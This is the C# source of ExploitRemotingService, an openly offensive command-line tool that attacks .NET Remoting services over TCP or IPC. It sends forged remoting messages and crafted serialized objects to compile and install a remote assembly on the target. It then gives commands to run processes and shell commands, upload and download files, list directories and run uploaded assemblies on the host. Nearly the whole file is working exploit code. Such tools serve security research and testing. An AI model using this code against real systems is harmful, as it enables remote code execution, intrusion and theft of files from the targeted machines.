﻿//    ExploitRemotingService
//    Copyright (C) 2014 James Forshaw
//
//    This program is free software: you can redistribute it and/or modify
//    it under the terms of the GNU General Public License as published by
//    the Free Software Foundation, either version 3 of the License, or
//    (at your option) any later version.
//
//    This program is distributed in the hope that it will be useful,
//    but WITHOUT ANY WARRANTY; without even the implied warranty of
//    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
//    GNU General Public License for more details.
//
//    You should have received a copy of the GNU General Public License
//    along with this program.  If not, see <http://www.gnu.org/licenses/>.

using System;
using System.CodeDom.Compiler;
using System.Collections;
using System.Collections.Generic;
using System.Configuration.Install;
using System.Diagnostics;
using System.IO;
using System.IO.Pipes;
using System.Linq;
using System.Net;
using System.Net.Security;
using System.Net.Sockets;
using System.Reflection;
using System.Runtime.Remoting;
using System.Runtime.Remoting.Channels;
using System.Runtime.Remoting.Channels.Ipc;
using System.Runtime.Remoting.Channels.Tcp;
using System.Runtime.Remoting.Messaging;
using System.Runtime.Serialization.Formatters;
using System.Runtime.Serialization.Formatters.Binary;
using System.Security.Principal;
using System.Text;
using FakeAsm;
using Microsoft.CSharp;
using NDesk.Options;

namespace ExploitRemotingService
{
    class Program
    {
        // Target service URI (first positional argument); its scheme ("tcp" or "ipc") selects the transport.
        private static Uri _uri;
        // Local TCP port used for the "port" property of the locally registered TcpChannel (default 11111).
        private static int _port;
        // Command to execute (second positional argument), dispatched in ExecuteCommand.
        private static string _cmd;
        // Remaining positional arguments after the URI and command.
        private static List<string> _cmdargs;
        // Credentials for secure mode; _username == null means the default network credentials are used.
        private static string _username;
        private static string _password;
        // Domain split off from a "domain\user" style --user value.
        private static string _domain;
        // Port name of the locally registered IpcChannel (default "remotingexploit").
        private static string _ipcname;        
        // True when secure mode was requested on the command line.
        private static bool _secure;
        // Remote version number passed to FakeMethod; 0 means "detect at startup" (see Main).
        private static int _ver;
        // Name of the remote object to register/look up (default Guid.Empty as a string).
        private static string _remotename;
        // True to wrap messages in a FakeComObjRef instead of marshalling them via .NET remoting.
        private static bool _usecom;
        // True to use SerializerRemoteClass instead of installing a remote class.
        private static bool _useser;
        
        /// <summary>
        /// Registers the local remoting channel (TCP or IPC, chosen by the scheme of <c>_uri</c>).
        /// Nothing is registered when the COM option is set without secure mode.
        /// </summary>
        /// <exception cref="InvalidOperationException">The URI scheme is neither "tcp" nor "ipc".</exception>
        static void SetupServer()
        {
            // We don't need anything if using COM as we're in a MTA unless we are also secure
            if (_usecom && !_secure)
            {
                return;
            }

            IDictionary formatterProps = new Hashtable();
            formatterProps["includeVersions"] = false;

            BinaryServerFormatterSinkProvider serverSink = new BinaryServerFormatterSinkProvider(formatterProps, null);
            BinaryClientFormatterSinkProvider clientSink = new BinaryClientFormatterSinkProvider(formatterProps, null);

            // Full type filtering on the local server side of the channel.
            serverSink.TypeFilterLevel = TypeFilterLevel.Full;

            IDictionary channelProps = new Hashtable();
            string scheme = _uri.Scheme;
            IChannel channel;

            if (scheme == "tcp")
            {
                channelProps["port"] = _port;
                channel = new TcpChannel(channelProps, clientSink, serverSink);
            }
            else if (scheme == "ipc")
            {
                channelProps["name"] = "ipc";
                channelProps["priority"] = "20";
                channelProps["portName"] = _ipcname;
                channelProps["secure"] = _secure;
                channel = new IpcChannel(channelProps, clientSink, serverSink);
            }
            else
            {
                throw new InvalidOperationException(String.Format("Unknown URI scheme {0}", scheme));
            }

            // Register the channel, requesting security only in secure mode.
            ChannelServices.RegisterChannel(channel, _secure);
        }

        /// <summary>
        /// Opens a connected stream to the service identified by <c>_uri</c>.
        /// For "tcp" a socket is connected to the URI host/port and, in secure mode, wrapped in an
        /// authenticated <see cref="NegotiateStream"/>. For "ipc" a named pipe on the local machine
        /// named after the URI host is connected.
        /// </summary>
        /// <returns>A connected stream; the caller owns it and must dispose it.</returns>
        /// <exception cref="InvalidOperationException">The URI scheme is not supported.</exception>
        private static Stream BindStream()
        {
            if (_uri.Scheme == "tcp")
            {
                TcpClient client = new TcpClient();

                try
                {
                    client.Connect(_uri.Host, _uri.Port);

                    Stream ret = client.GetStream();

                    if (_secure)
                    {
                        NegotiateStream stm = new NegotiateStream(ret);
                        NetworkCredential cred = _username == null ? CredentialCache.DefaultNetworkCredentials : new NetworkCredential(_username, _password, _domain);

                        stm.AuthenticateAsClient(cred, String.Empty, ProtectionLevel.EncryptAndSign, TokenImpersonationLevel.Impersonation);

                        ret = stm;
                    }

                    return ret;
                }
                catch
                {
                    // Connect/authenticate failed: release the socket instead of leaking it.
                    client.Close();
                    throw;
                }
            }
            else if (_uri.Scheme == "ipc")
            {
                NamedPipeClientStream stm = new NamedPipeClientStream(".", _uri.Host, PipeDirection.InOut, PipeOptions.None,
                    TokenImpersonationLevel.Impersonation, HandleInheritability.None);

                try
                {
                    stm.Connect();

                    return stm;
                }
                catch
                {
                    // Connection failed: release the pipe handle instead of leaking it.
                    stm.Dispose();
                    throw;
                }
            }

            throw new InvalidOperationException("Could not bind stream");
        }

        /// <summary>
        /// Parses the command line into the static configuration fields.
        /// </summary>
        /// <param name="args">Raw command-line arguments.</param>
        /// <returns>
        /// <c>true</c> when a URI and a command were parsed; <c>false</c> when help was requested or
        /// parsing failed (the error message and the help text are printed in that case).
        /// </returns>
        private static bool ProcessArgs(string[] args)
        {
            bool verbose = false;
            bool helpRequested = false;

            // Defaults, overridable by the options below.
            _port = 11111;
            _ipcname = "remotingexploit";
            _remotename = Guid.Empty.ToString();
            _ver = 0;

            OptionSet options = new OptionSet();

            options.Add("s|secure", "Enable secure mode", v => _secure = v != null);
            options.Add("p|port=", "Specify the local TCP port to listen on", v => _port = int.Parse(v));
            options.Add("i|ipc=", "Specify listening pipe name for IPC channel", v => _ipcname = v);
            options.Add("user=", "Specify username for secure mode", v =>
            {
                _username = v;

                // A "domain\user" value is split into its domain and user parts.
                string[] parts = v.Split('\\');

                if (parts.Length > 1)
                {
                    _domain = parts[0];
                    _username = parts[1];
                }
            });
            options.Add("pass=", "Specify password for secure mode", v => _password = v);
            options.Add("ver=", "Specify version number for remote, 2 or 4", v => _ver = int.Parse(v));
            options.Add("usecom", "Use DCOM backchannel instead of .NET remoting", v => _usecom = v != null);
            options.Add("remname=", "Specify the remote object name to register", v => _remotename = v);
            options.Add("v|verbose", "Enable verbose debug output", v => verbose = v != null);
            options.Add("useser", "Uses old serialization tricks, only works on full type filter services",
                v => _useser = v != null);
            options.Add("h|?|help", v => helpRequested = v != null);

            try
            {
                List<string> positional = options.Parse(args);

                if (verbose)
                {
                    Trace.Listeners.Add(new ConsoleTraceListener(true));
                }

                if (positional.Count < 2)
                {
                    throw new InvalidOperationException("Must specify a URI and command");
                }

                _uri = new Uri(positional[0], UriKind.Absolute);
                _cmd = positional[1];

                // Whatever follows the URI and the command becomes the command's arguments.
                positional.RemoveRange(0, 2);
                _cmdargs = positional;
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex.Message);
                helpRequested = true;
            }

            if (!helpRequested)
            {
                return true;
            }

            PrintHelp(options);
            return false;
        }

        /// <summary>
        /// Prints the usage banner, the option descriptions and the list of supported commands
        /// to standard output.
        /// </summary>
        /// <param name="p">Option set whose descriptions are written between the two text blocks.</param>
        static void PrintHelp(OptionSet p)
        {
            Console.WriteLine(@"ExploitRemotingService [options] uri command [command args]
Copyright (c) James Forshaw 2014

Uri:
The supported URI are as follows:
tcp://host:port/ObjName   - TCP connection on host and portname
ipc://channel/ObjName     - Named pipe channel

Options:
");

            p.WriteOptionDescriptions(Console.Out);

            // The OS version command is listed as "osver" because that is the name the
            // command dispatcher in this file actually handles.
            Console.WriteLine(@"
Commands:
exec [-wait] program [cmdline]: Execute a process on the hosting server
cmd  cmdline                  : Execute a command line process and display stdout
put  localfile remotefile     : Upload a file to the hosting server
get  remotefile localfile     : Download a file from the hosting server
ls   remotedir                : List a remote directory
run  file [args]              : Upload and execute an assembly, calls entry point
user                          : Print the current username
osver                         : Print the OS version
");
        }

        /// <summary>
        /// Serializes an object graph with <see cref="BinaryFormatter"/> using simple assembly names.
        /// </summary>
        /// <param name="o">Object to serialize.</param>
        /// <param name="remote">
        /// When <c>true</c>, a <see cref="RemotingSurrogateSelector"/> is installed on the formatter.
        /// </param>
        /// <returns>The serialized bytes.</returns>
        private static byte[] SerializeObject(object o, bool remote)
        {
            BinaryFormatter formatter = new BinaryFormatter
            {
                AssemblyFormat = FormatterAssemblyStyle.Simple
            };

            if (remote)
            {
                formatter.SurrogateSelector = new RemotingSurrogateSelector();
            }

            using (MemoryStream buffer = new MemoryStream())
            {
                formatter.Serialize(buffer, o);

                return buffer.ToArray();
            }
        }

        /// <summary>
        /// Reads a counted string: one encoding byte (0 = UTF-16LE, 1 = UTF-8), a 32-bit byte
        /// length, then that many bytes of string data.
        /// </summary>
        /// <param name="reader">Reader positioned at the encoding byte.</param>
        /// <returns>The decoded string.</returns>
        /// <exception cref="InvalidDataException">The length field is negative.</exception>
        /// <exception cref="EndOfStreamException">The stream ended before the whole string was read.</exception>
        /// <exception cref="InvalidOperationException">The encoding byte is neither 0 nor 1.</exception>
        private static string ReadHeaderString(BinaryReader reader)
        {
            int encType = reader.ReadByte();
            int length = reader.ReadInt32();

            if (length < 0)
            {
                throw new InvalidDataException("Invalid string length");
            }

            byte[] data = reader.ReadBytes(length);

            // ReadBytes returns fewer bytes at end of stream; do not decode a truncated string.
            if (data.Length != length)
            {
                throw new EndOfStreamException("Truncated header string");
            }

            switch (encType)
            {
                case 0:
                    return Encoding.Unicode.GetString(data);
                case 1:
                    return Encoding.UTF8.GetString(data);
                default:
                    throw new InvalidOperationException("Invalid string encoding");
            }
        }

        /// <summary>
        /// Consumes the header section of a response: a sequence of 16-bit header tokens terminated
        /// by token 0. Each header is written to the trace output as "Header: name=value".
        /// </summary>
        /// <param name="reader">Reader positioned at the first header token.</param>
        /// <exception cref="InvalidOperationException">A header carries an unknown data type byte.</exception>
        private static void ReadHeaders(BinaryReader reader)
        {
            for (ushort token = reader.ReadUInt16(); token != 0; token = reader.ReadUInt16())
            {
                // Headers other than token 1 are reported under their numeric token.
                string headerName = token.ToString();
                object headerValue = null;

                if (token == 1)
                {
                    // Token 1 carries its own name and value as two counted strings.
                    headerName = ReadHeaderString(reader);
                    headerValue = ReadHeaderString(reader);
                }
                else
                {
                    byte dataType = reader.ReadByte();

                    if (dataType == 1)
                    {
                        headerValue = ReadHeaderString(reader);
                    }
                    else if (dataType == 2)
                    {
                        headerValue = reader.ReadByte();
                    }
                    else if (dataType == 3)
                    {
                        headerValue = reader.ReadUInt16();
                    }
                    else if (dataType == 4)
                    {
                        headerValue = reader.ReadInt32();
                    }
                    else if (dataType != 0)
                    {
                        // Data type 0 has no payload; anything above 4 is not understood.
                        throw new InvalidOperationException("Unknown header data type");
                    }
                }

                Trace.WriteLine(String.Format("Header: {0}={1}", headerName, headerValue));
            }
        }

        /// <summary>
        /// Parses a response frame: checks the magic value, skips the version/operation fields,
        /// reads the content length and headers, then deserializes the body with
        /// <see cref="BinaryFormatter"/>.
        /// </summary>
        /// <param name="reader">Reader positioned at the start of the response.</param>
        /// <returns>
        /// The exception carried by the return message if there is one, otherwise its return value
        /// (or the string "void" when that is null); the string "Error" when the body is not an
        /// <see cref="IMethodReturnMessage"/>.
        /// </returns>
        /// <exception cref="InvalidDataException">The response does not start with the expected magic value.</exception>
        private static object ParseResult(BinaryReader reader)
        {
            const uint ExpectedMagic = 0x54454E2E;

            if (reader.ReadUInt32() != ExpectedMagic)
            {
                throw new InvalidDataException("Invalid magic value");
            }

            reader.ReadByte();   // Major
            reader.ReadByte();   // Minor
            reader.ReadUInt16(); // Operation Type
            reader.ReadUInt16(); // Content distribution

            int bodyLength = reader.ReadInt32();

            ReadHeaders(reader);

            byte[] body = reader.ReadBytes(bodyLength);

            BinaryFormatter formatter = new BinaryFormatter
            {
                AssemblyFormat = FormatterAssemblyStyle.Simple
            };

            // NOTE: the body comes from the remote endpoint and is handed to BinaryFormatter as-is.
            IMethodReturnMessage reply = formatter.Deserialize(new MemoryStream(body)) as IMethodReturnMessage;

            if (reply == null)
            {
                return "Error";
            }

            if (reply.Exception != null)
            {
                return reply.Exception;
            }

            return reply.ReturnValue ?? "void";
        }

        /// <summary>
        /// Looks up a public static method by name and exact parameter types.
        /// </summary>
        /// <param name="type">Type declaring the method.</param>
        /// <param name="name">Method name.</param>
        /// <param name="argTypes">Parameter types of the wanted overload.</param>
        /// <returns>The matching method.</returns>
        /// <exception cref="InvalidOperationException">No matching method exists.</exception>
        private static MethodBase GetStaticMethod(Type type, string name, params Type[] argTypes)
        {
            const BindingFlags PublicStatic = BindingFlags.Public | BindingFlags.Static;

            MethodBase found = type.GetMethod(name, PublicStatic, null, argTypes, null);

            if (found != null)
            {
                return found;
            }

            string[] typeNames = Array.ConvertAll(argTypes, t => t.FullName);
            string message = String.Format("Could not get method {0} with types {1}", name, String.Join(",", typeNames));

            throw new InvalidOperationException(message);
        }

        /// <summary>
        /// Builds a <c>FakeMethod</c> wrapping the parameterless generic
        /// <c>Activator.CreateInstance&lt;T&gt;()</c> closed over <typeparamref name="T"/>.
        /// </summary>
        /// <typeparam name="T">Type the wrapped method would instantiate.</typeparam>
        /// <returns>The wrapped method, created with the current <c>_ver</c> value.</returns>
        private static MethodBase GetCreateInstance<T>()
        {
            MethodInfo openGeneric = typeof(Activator).GetMethod("CreateInstance", new Type[0]);
            MethodInfo closed = openGeneric.MakeGenericMethod(typeof(T));

            return new FakeMethod(closed, _ver);
        }

        /// <summary>
        /// Obtains an <c>IRemoteClass</c> reference for the object named <c>_remotename</c> at the
        /// root of the target URI, via <see cref="Activator.GetObject(Type, string)"/>.
        /// </summary>
        /// <returns>The object returned by <c>Activator.GetObject</c>, cast to <c>IRemoteClass</c>.</returns>
        private static IRemoteClass GetExistingRemoteClass()
        {
            Uri objectUri = new Uri(_uri, "/" + _remotename);
            object proxy = Activator.GetObject(typeof(IRemoteClass), objectUri.ToString());

            return (IRemoteClass)proxy;
        }

        /// <summary>
        /// Reads an embedded manifest resource of this assembly as text.
        /// </summary>
        /// <param name="name">Resource name without the "ExploitRemotingService." prefix.</param>
        /// <returns>The resource contents, or <c>null</c> when no such resource exists.</returns>
        private static string GetResource(string name)
        {
            string resourceName = "ExploitRemotingService." + name;

            using (Stream resource = typeof(Program).Assembly.GetManifestResourceStream(resourceName))
            {
                if (resource == null)
                {
                    return null;
                }

                return new StreamReader(resource).ReadToEnd();
            }
        }

        // IRemoteClass implementation returned by CreateRemoteClass when the "useser" option is set.
        // Instead of calling an installed remote object it sends a Hashtable whose equality comparer
        // is this instance (see SendRequestToServer) and then works with whatever object was last
        // handed to IEqualityComparer.GetHashCode. Only the directory/file operations are
        // implemented; every other IRemoteClass member throws NotImplementedException.
        private class SerializerRemoteClass : MarshalByRefObject, IRemoteClass, IEqualityComparer
        {
            // Creates a DirectoryInfo or FileInfo for "." and then overwrites its non-public
            // "FullPath" field with the requested path via reflection, so the path is stored
            // exactly as given.
            private static FileSystemInfo GetFileInfo(string path, bool directory)
            {
                FileSystemInfo info;

                if (directory)
                {
                    info = new DirectoryInfo(".");
                }
                else
                {
                    info = new FileInfo(".");
                }

                // NOTE(review): fi is not null-checked; if the field lookup fails SetValue below
                // throws NullReferenceException.
                FieldInfo fi = typeof(FileSystemInfo).GetField("FullPath", System.Reflection.BindingFlags.Instance | System.Reflection.BindingFlags.NonPublic);

                fi.SetValue(info, path);

                return info;
            }

            // Wraps retobj as a key of a Hashtable that uses this instance as its comparer and
            // sends the table with SendRequest(remote: true); the result is only traced.
            // NOTE(review): presumably the receiving side calls back into GetHashCode while
            // rebuilding the table, which is what replaces _capturedobj with the object the
            // callers then use — confirm. Hashtable.Add below also hashes the keys locally
            // through this comparer, so _capturedobj appears to hold the local retobj until
            // such a callback happens — verify what callers see if it never does.
            private void SendRequestToServer(object retobj)
            {                
                Hashtable hash = new Hashtable(this);

                hash.Add(retobj, "a");
                hash.Add("Dummy", "a");

                Trace.WriteLine(SendRequest(hash, true).ToString());
            }

            // Not supported by this implementation.
            public Process RunProcess(string process, string args)
            {
                throw new NotImplementedException();
            }

            // Not supported by this implementation.
            public string RunCommand(string cmd)
            {
                throw new NotImplementedException();
            }

            // Not supported by this implementation.
            public int ExecuteAssembly(byte[] asm, string[] args)
            {
                throw new NotImplementedException();
            }

            // Sends a DirectoryInfo for path and returns the captured object cast to DirectoryInfo
            // (the cast throws InvalidCastException if a different kind of object was captured).
            public DirectoryInfo GetDirectory(string path)
            {
                SendRequestToServer(GetFileInfo(path, true));

                return (DirectoryInfo)_capturedobj;
            }

            // Sends a FileInfo for path and, if the captured object is a FileInfo, creates/overwrites
            // that file with contents. Silently does nothing when no FileInfo was captured.
            public void WriteFile(string path, byte[] contents)
            {
                SendRequestToServer(GetFileInfo(path, false));

                FileInfo obj = _capturedobj as FileInfo;
                if (obj != null)
                {
                    using (FileStream stm = obj.Open(FileMode.Create, FileAccess.ReadWrite))
                    {
                        stm.Write(contents, 0, contents.Length);
                    }
                }                
            }

            // Sends a FileInfo for path and, if the captured object is a FileInfo, reads the whole
            // file in 1024-byte chunks. Returns an empty array when no FileInfo was captured.
            public byte[] ReadFile(string path)
            {
                SendRequestToServer(GetFileInfo(path, false));

                FileInfo obj = _capturedobj as FileInfo;
                if (obj != null)
                {
                    using (FileStream stm = obj.OpenRead())
                    {
                        List<byte> data = new List<byte>();
                        byte[] buf = new byte[1024];

                        // Read until the stream reports end of file (Read returns 0).
                        int len = stm.Read(buf, 0, buf.Length);
                        while(len > 0)
                        {
                            // Only the first len bytes of buf are valid for this chunk.
                            data.AddRange(buf.Take(len));

                            len = stm.Read(buf, 0, buf.Length);
                        }

                        return data.ToArray();
                    }
                }

                return new byte[0];
            }

            // Not supported by this implementation.
            public string GetUsername()
            {
                throw new NotImplementedException();
            }

            // Not supported by this implementation.
            public OperatingSystem GetOSVersion()
            {
                throw new NotImplementedException();
            }

            // Last non-string object passed to IEqualityComparer.GetHashCode.
            private object _capturedobj;

            // Plain object equality; x must not be null.
            bool IEqualityComparer.Equals(object x, object y)
            {
                return x.Equals(y);
            }

            // Strings hash normally. Any other object is remembered in _capturedobj and given
            // the constant hash code 1.
            int IEqualityComparer.GetHashCode(object obj)
            {              
                if (obj is string)
                {
                    return obj.GetHashCode();
                }
                else
                {
                    _capturedobj = obj;
                    return 1;
                }                
            }
        }

        /// <summary>
        /// Produces the <c>IRemoteClass</c> used to execute commands.
        /// With the "useser" option a local <c>SerializerRemoteClass</c> is returned. Otherwise, for
        /// non-IPC targets, an already registered remote object is reused if it answers; if not, the
        /// embedded sources are compiled through remote calls into "Installer.dll" in the remote temp
        /// path. For IPC targets the location of the local <c>IRemoteClass</c> assembly is used.
        /// An <see cref="AssemblyInstaller"/> is then run against that path and the registered
        /// object is looked up.
        /// </summary>
        /// <returns>The remote class reference; it is not verified to be usable.</returns>
        private static IRemoteClass CreateRemoteClass()
        {
            if (_useser)
            {
                return new SerializerRemoteClass();
            }

            string path;

            if (_uri.Scheme != "ipc")
            {
                IRemoteClass ret = GetExistingRemoteClass();

                try
                {
                    // Probe call: if it succeeds the object is already registered and is reused.
                    ret.ToString();

                    return ret;
                }
                catch (RemotingException ex)
                {
                    // Probe failed: fall through and install the remote class.
                    Trace.WriteLine(String.Format("Existing remote class not available: {0}", ex.Message));
                }

                path = MakeCall<string>(_uri.AbsolutePath, GetStaticMethod(typeof(Path), "GetTempPath"));

                path = Path.Combine(path, "Installer.dll");

                CodeDomProvider compiler = MakeCall<CodeDomProvider>(_uri.AbsolutePath, GetCreateInstance<CSharpCodeProvider>());

                string uri = RemotingServices.GetObjectUri(compiler);

                CompilerParameters cp = new CompilerParameters();

                cp.ReferencedAssemblies.Add("System.dll");
                cp.ReferencedAssemblies.Add("System.Configuration.Install.dll");
                cp.OutputAssembly = path;

                cp.GenerateInMemory = false;
                cp.GenerateExecutable = false;

                string code = GetResource("RemoteClass.cs");
                string intf = GetResource("IRemoteClass.cs");
                string inst = GetResource("InstallClass.cs");

                CompilerResults res = MakeCall<CompilerResults>(uri,
                        new FakeMethod(typeof(CodeDomProvider).GetMethod("CompileAssemblyFromSource"), _ver),
                        cp, new string[] { code, intf, inst });

                // Surface compile failures in the trace output; the flow continues as before.
                if (res != null && res.Errors.HasErrors)
                {
                    foreach (CompilerError err in res.Errors)
                    {
                        Trace.WriteLine(String.Format("Remote compile error: {0}", err));
                    }
                }
            }
            else
            {
                path = typeof(IRemoteClass).Assembly.Location;
            }

            try
            {
                AssemblyInstaller installer = MakeCall<AssemblyInstaller>(_uri.AbsolutePath, GetCreateInstance<AssemblyInstaller>());

                installer.Path = path;
                installer.CommandLine = new string[] { "/name=" + _remotename };
                installer.UseNewContext = true;

                installer.Install(new Hashtable());
            }
            catch (Exception ex)
            {
                // In the IPC case this might fail
                // Just continue on with the creation of the remote class and see if we're lucky
                Trace.WriteLine(String.Format("Installer call failed, continuing: {0}", ex));
            }

            return GetExistingRemoteClass();
        }

        /// <summary>
        /// Serializes <paramref name="o"/>, frames it as a request (magic, version 1.0, operation
        /// and content-distribution fields set to 0, body length, a URI header holding <c>_uri</c>,
        /// header terminator, body), sends it over a freshly bound stream and parses the reply.
        /// </summary>
        /// <param name="o">Object to send as the request body.</param>
        /// <param name="remote">Forwarded to <c>SerializeObject</c>.</param>
        /// <returns>The value produced by <c>ParseResult</c> for the reply.</returns>
        static object SendRequest(object o, bool remote)
        {
            byte[] body = SerializeObject(o, remote);
            byte[] requestUri = Encoding.UTF8.GetBytes(_uri.ToString());
            byte[] frame;

            using (MemoryStream buffer = new MemoryStream())
            {
                BinaryWriter frameWriter = new BinaryWriter(buffer);

                frameWriter.Write((uint)0x54454E2E);  // Header
                frameWriter.Write((byte)1);           // Major
                frameWriter.Write((byte)0);           // Minor
                frameWriter.Write((ushort)0);         // OperationType
                frameWriter.Write((ushort)0);         // ContentDistribution
                frameWriter.Write(body.Length);       // Data Length

                frameWriter.Write((ushort)4);         // UriHeader
                frameWriter.Write((byte)1);           // DataType
                frameWriter.Write((byte)1);           // Encoding: UTF8
                frameWriter.Write(requestUri.Length); // Length
                frameWriter.Write(requestUri);        // URI

                frameWriter.Write((ushort)0);         // Terminating Header
                frameWriter.Write(body);              // Data

                frameWriter.Flush();
                frame = buffer.ToArray();
            }

            using (Stream netStream = BindStream())
            using (BinaryWriter netWriter = new BinaryWriter(netStream))
            {
                netWriter.Write(frame);

                // The reply is read from the same connection.
                return ParseResult(new BinaryReader(netStream));
            }
        }

        /// <summary>
        /// Typed convenience wrapper around the non-generic <c>MakeCall</c>.
        /// </summary>
        /// <typeparam name="T">Expected type of the call result.</typeparam>
        /// <param name="path">Object path passed through to the call message.</param>
        /// <param name="mi">Method to invoke.</param>
        /// <param name="cmdargs">Arguments for the method.</param>
        /// <returns>The call result cast to <typeparamref name="T"/>.</returns>
        public static T MakeCall<T>(string path, MethodBase mi, params object[] cmdargs)
        {
            object result = MakeCall(path, mi, cmdargs);

            return (T)result;
        }

        /// <summary>
        /// Builds the object that is sent as the request body for a call: a <c>FakeMessage</c>
        /// wrapped in a <c>FakeComObjRef</c> when the COM option is set, otherwise the result of
        /// marshalling the message with <see cref="RemotingServices.Marshal(MarshalByRefObject)"/>.
        /// </summary>
        /// <param name="path">Object path for the message.</param>
        /// <param name="method">Method the message describes.</param>
        /// <param name="args">Arguments for the method.</param>
        /// <returns>The wrapped message.</returns>
        private static object GetMessageObject(string path, MethodBase method, object[] args)
        {
            FakeMessage message = new FakeMessage(path, method, args);

            if (!_usecom)
            {
                return RemotingServices.Marshal(message);
            }

            return new FakeComObjRef(message);
        }

        /// <summary>
        /// Sends a call message for <paramref name="mi"/> and returns the reply.
        /// </summary>
        /// <param name="path">Object path passed through to the call message.</param>
        /// <param name="mi">Method to invoke.</param>
        /// <param name="cmdargs">Arguments for the method.</param>
        /// <returns>The reply object when it is not an exception.</returns>
        /// <exception cref="Exception">The reply was an exception object; it is rethrown as-is.</exception>
        public static object MakeCall(string path, MethodBase mi, params object[] cmdargs)
        {
            object reply = SendRequest(GetMessageObject(path, mi, cmdargs), false);
            Exception failure = reply as Exception;

            if (failure != null)
            {
                throw failure;
            }

            return reply;
        }

        /// <summary>
        /// Returns the public getter of the public property <paramref name="name"/> on
        /// <paramref name="t"/>.
        /// </summary>
        /// <param name="t">Type declaring the property.</param>
        /// <param name="name">Property name.</param>
        /// <returns>The property's public get accessor.</returns>
        /// <exception cref="ArgumentException">
        /// The property does not exist or has no public getter.
        /// </exception>
        public static MethodBase GetProperty(Type t, string name)
        {
            PropertyInfo property = t.GetProperty(name);

            // GetProperty returns null for an unknown name; treat that like a missing getter
            // instead of dereferencing it.
            MethodBase b = property != null ? property.GetGetMethod() : null;

            if (b == null)
            {
                throw new ArgumentException("Invalid property name");
            }

            return b;
        }

        /// <summary>
        /// Determines the major runtime version to assume for the target. Unless the "useser"
        /// option is set, <c>Environment.Version</c> is requested through a remote call; if that
        /// is skipped or fails, the local runtime version is used and a notice is printed.
        /// </summary>
        /// <returns>The major component of the detected (or local) version.</returns>
        static int DetectMajorVersion()
        {
            Version ver = null;

            if (!_useser)
            {
                try
                {
                    ver = MakeCall<Version>(_uri.AbsolutePath, GetProperty(typeof(Environment), "Version"));
                }
                catch (Exception ex)
                {
                    // Best effort: fall back to the host version below, but keep the reason
                    // visible in the trace output.
                    Trace.WriteLine(String.Format("Remote version detection failed: {0}", ex));
                }
            }

            if (ver == null)
            {
                ver = Environment.Version;
                Console.WriteLine("Error, couldn't detect version, using host: {0}", ver);
            }

            return ver.Major;
        }

        /// <summary>
        /// Dispatches the parsed command (<c>_cmd</c> with <c>_cmdargs</c>) to the remote class and
        /// prints the outcome. Argument-count problems and unknown commands are reported on
        /// standard error without throwing.
        /// </summary>
        /// <param name="c">Remote class that performs the operations.</param>
        private static void ExecuteCommand(IRemoteClass c)
        {
            switch (_cmd)
            {
                case "exec":
                    {
                        bool wait = false;

                        // An optional leading "-wait" flag is consumed before counting arguments.
                        if (_cmdargs.Count > 0 && _cmdargs[0].Equals("-wait", StringComparison.OrdinalIgnoreCase))
                        {
                            wait = true;
                            _cmdargs.RemoveAt(0);
                        }

                        if ((_cmdargs.Count == 0) || (_cmdargs.Count > 2))
                        {
                            Console.Error.WriteLine("Must specify at least 1 or two options for exec command");
                        }
                        else
                        {
                            string cmd = _cmdargs[0];
                            string cmdline = _cmdargs.Count > 1 ? _cmdargs[1] : String.Empty;

                            Process p = c.RunProcess(cmd, cmdline);

                            Console.WriteLine("Received new process id {0}", p.Id);

                            if (wait)
                            {
                                p.WaitForExit();
                            }
                        }
                    }
                    break;
                case "cmd":
                    if (_cmdargs.Count != 1)
                    {
                        Console.Error.WriteLine("Must specify 1 argument for cmd command");
                    }
                    else
                    {
                        string ret = c.RunCommand(_cmdargs[0]);

                        Console.WriteLine(ret);
                    }
                    break;
                case "ls":
                    if (_cmdargs.Count != 1)
                    {
                        Console.Error.WriteLine("Must specify 1 argument for ls command");
                    }
                    else
                    {
                        DirectoryInfo dir = c.GetDirectory(_cmdargs[0]);

                        Console.WriteLine("Listing {0} directory", dir.FullName);

                        foreach (DirectoryInfo d in dir.GetDirectories())
                        {
                            Console.WriteLine("<DIR> {0}", d.Name);
                        }

                        foreach (FileInfo f in dir.GetFiles())
                        {
                            Console.WriteLine("{0} - Length {1}", f.Name, f.Length);
                        }
                    }

                    break;
                case "put":
                    if (_cmdargs.Count != 2)
                    {
                        Console.Error.WriteLine("Must specify localfile and remotefile argument");
                    }
                    else
                    {
                        byte[] data = File.ReadAllBytes(_cmdargs[0]);

                        c.WriteFile(_cmdargs[1], data);
                    }

                    break;
                case "get":
                    if (_cmdargs.Count != 2)
                    {
                        // Argument order for get is remote first, then local.
                        Console.Error.WriteLine("Must specify remotefile and localfile argument");
                    }
                    else
                    {
                        byte[] data = c.ReadFile(_cmdargs[0]);

                        File.WriteAllBytes(_cmdargs[1], data);
                    }
                    break;
                case "run":
                    if (_cmdargs.Count < 1)
                    {
                        Console.Error.WriteLine("Must specify an assembly file to upload");
                    }
                    else
                    {
                        byte[] asm = File.ReadAllBytes(_cmdargs[0]);

                        string[] args = _cmdargs.Skip(1).ToArray();

                        Console.WriteLine("Result: {0}", c.ExecuteAssembly(asm, args));
                    }

                    break;
                case "user":
                    Console.WriteLine("User: {0}", c.GetUsername());
                    break;
                // "ver" is the name shown in the help text; "osver" is kept for compatibility.
                case "ver":
                case "osver":
                    Console.WriteLine("OS: {0}", c.GetOSVersion());
                    break;
                default:
                    Console.Error.WriteLine(String.Format("Unknown command {0}", _cmd));
                    break;
            }
        }

        /// <summary>
        /// Program entry point: parses arguments, registers the local channel, resolves the target
        /// version if none was given, obtains the remote class and runs the requested command.
        /// </summary>
        /// <param name="args">Command-line arguments.</param>
        /// <returns>0 on success; 1 when argument parsing fails or an exception is thrown.</returns>
        [MTAThread]
        static int Main(string[] args)
        {
            if (!ProcessArgs(args))
            {
                return 1;
            }

            try
            {
                SetupServer();

                // A version of 0 means none was supplied on the command line.
                if (_ver == 0)
                {
                    _ver = DetectMajorVersion();

                    Console.WriteLine("Detected version {0} server", _ver);
                }

                IRemoteClass remote = CreateRemoteClass();

                ExecuteCommand(remote);
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex);
                return 1;
            }

            return 0;
        }
    }
}
